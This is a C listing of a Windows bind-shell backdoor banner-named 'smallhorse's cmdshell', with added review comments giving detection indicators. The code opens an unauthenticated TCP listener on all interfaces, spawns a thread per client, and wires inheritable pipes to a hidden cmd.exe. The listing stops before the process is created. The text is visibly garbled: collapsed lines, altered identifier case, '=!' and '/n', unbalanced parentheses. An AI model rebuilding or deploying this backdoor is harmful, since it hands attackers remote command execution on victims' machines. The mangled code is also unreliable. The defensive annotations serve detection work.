#include
// OpenDoor: the TCP listener half of a remote command shell. The banner text
// on the accept line below names it "smallhorse's cmdshell".
//
// NOTE(review): this listing was damaged in extraction/translation and does
// not compile as shown. Statements are collapsed onto a few physical lines, so
// every "//" swallows the rest of its line. Identifier case is altered
// (RETURN, If, Socket_ERROR, Printf). "=!" stands where "!=" is presumably
// meant, and "/n" where a newline escape is presumably meant. The accept()
// and send() calls have unbalanced parentheses. The code is left exactly as
// found; only comments are added.
//
// What the visible text does, in order:
//   1. WSAStartup (MAKEWORD (2,2)) initialises Winsock; returns on failure.
//   2. Creates an AF_INET / SOCK_STREAM / IPPROTO_TCP socket.
//   3. Binds it to INADDR_ANY, i.e. every local interface, on `port`
//      (declared outside this listing).
//   4. listen() with a backlog of 5, then loops forever on accept().
//   5. Per connection: sends the banner string, starts ClientThread via
//      CreateThread with a pointer to AcceptClient, then sleeps 1000 ms
//      before the next accept().
//
// Security relevance: no authentication or peer-address check appears
// anywhere in the visible code between accept() and the thread hand-off.
// ClientThread runs past the end of this listing, so confirm against the
// full source before concluding there is none.
//
// Host-side indicators consistent with the visible code: a process holding an
// unexpected listening TCP socket bound to all interfaces, and (from the
// ClientThread fragment that follows) inheritable anonymous pipes wired into a
// STARTUPINFO with STARTF_USESTDHANDLES and SW_HIDE, next to a command line
// built from the system directory plus cmd.exe. The process-creation call
// itself is not in the visible text, so this is presumably a hidden cmd.exe
// whose stdin/stdout/stderr are the pipes. Inbound default-deny on the host
// firewall and process-creation telemetry (parent/child pair, redirected
// standard handles) are the controls that surface this pattern.
void OpenDoor () {// initialize Winsock WSADATA wsaData;. SOCKET m_socket, AcceptClient; sockaddr_in Service, Client; int ClientSize, i = 0; int iResult = WSAStartup (MAKEWORD (2,2), & wsaData); if (iResult =! NO_ERROR) RETURN;
// Create a socket m_socket = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);. If (m_socket == SOCKET_ERROR) return; Service.sin_family = AF_INET; Service.sin_addr.s_addr = htonl (INADDR_ANY); Service.sin_port = htons (port );
// The next physical line holds bind/listen, the whole accept loop, the end of
// OpenDoor, and the opening of ClientThread. ClientThread copies the SOCKET
// out of lpParam and fills a SECURITY_ATTRIBUTES with handle inheritance
// enabled; its body continues beyond this listing.
IF (bind (m_socket, (sockaddr *) & service, sizeof (service)) == SOCKET_ERROR) RETURN; / / Bond IF (Listen (M_Socket, 5) == Socket_ERROR) Return; // Maximum Monitor Column 5 Printf "/ NSMALLHORSE LISTEN ON Port:% D ... ^ * ^ / n", port); clientsize = sizeof (client); while (1) {acceptclient = accept (m_socket, (sockaddr *) & client, & clientsize; if (Acceptclient == Socket_ERROR) RETURN; // Accept the connection printf ("Client Connected./N"); char * sendbuf = "/ ********************** ***************** /// n / tthanks for use ... / n / tsmallhorse's cmdshell! / n / tgood luck! / n // ***** ********************************* // n / n "; send (AcceptClient, Sendbuf, Strlen (SendBuf) ), 0); if (Createthread (NULL, 0, ClientthRead, (LPVOID) & AcceptClient, 0, NULL) == NULL) Printf ("Create Thread Error! / N"); SLEEP (1000);} wsacleanup (); return;} DWORD WINAPI ClientThread (LPVOID lpParam) {int ret; char Buf [1024]; HANDLE Rpipe, Wpipe, Wfile, Rfile; SOCKET acceptClient = (SOCKET) * (SOCKET *) lpParam; SECURITY_ATTRIBUTES sa; sa.nLength = sizeof (sa) ; sa.binherithandle = true; sa.lpsecurityDescriptor = null;
RET = CreatePipe (& RPIPE, & RILE, & SA, 0); RET = CREATEPIPE (& WFile, & Wpipe, & Sa, 0); // Establish two pipes, used to receive commands and display results, respectively
STARTUPINFO startinfo; GetStartupInfo (& startinfo); startinfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; startinfo.hStdInput = Wfile; startinfo.hStdError = startinfo.hStdOutput = Rfile; startinfo.wShowWindow = SW_HIDE;
Char cmdline [max_path]; getSystemDirectory (cmdline, max_path); strcat (cmdline, ("// cmd.exe"));